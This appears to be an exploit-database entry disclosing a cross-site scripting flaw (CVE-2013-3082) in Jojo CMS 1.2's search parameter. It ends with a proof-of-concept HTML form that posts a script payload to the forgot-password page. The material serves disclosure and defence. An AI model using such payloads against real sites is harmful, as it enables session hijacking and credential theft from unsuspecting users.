Jojo CMS - 'search' Cross-Site Scripting

Author: High-Tech Bridge SA
type: webapps
platform: php
port: 
date_added: 2013-05-15  
date_updated: 2015-10-23  
verified: 1  
codes: CVE-2013-3082;OSVDB-93438  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 38518.txt  
source: https://www.securityfocus.com/bid/59933/info

Jojo CMS is prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Jojo CMS 1.2 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/forgot-password/" method="post">
<input type="hidden" name="search" value='<script>alert(document.cookike);</script>'>
<input type="submit" id="btn">
</form>